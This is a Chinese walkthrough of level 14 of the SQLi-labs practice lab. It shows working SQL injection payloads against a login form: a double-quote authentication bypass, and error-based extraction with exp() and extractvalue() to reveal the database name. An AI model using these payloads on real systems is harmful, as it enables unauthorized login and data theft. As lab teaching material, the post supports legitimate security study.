sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
闪闪发亮的小星星10 分钟前
STK中计算两星距离
笔记
GlueNa2SiO343 分钟前
07-Docker Compose多容器编排
笔记·学习·docker·容器
沐苏瑶1 小时前
计算机网络核心笔记:打通 TCP/UDP 与 HTTP/HTTPS 底层逻辑(重点下)
笔记·计算机网络·http
GlueNa2SiO32 小时前
01-Docker入门与核心概念
笔记·docker·容器
Brilliantwxx2 小时前
【Linux】 开发|Git 版本控制与 gdb/cgdb 调试
linux·笔记·git
xian_wwq2 小时前
【学习笔记】工具设计,Agent 的手比大脑更容易出问题-8/16
笔记·学习·agent
晴天162 小时前
Agent 全栈学习笔记 1-Day14
数据库·笔记·学习
今儿敲了吗17 小时前
CO——CPU
笔记
今儿敲了吗17 小时前
Python ——第三方包
笔记·python
吃着火锅x唱着歌17 小时前
Effective C++ 学习笔记 条款40 明智而审慎地使用多重继承
c++·笔记·学习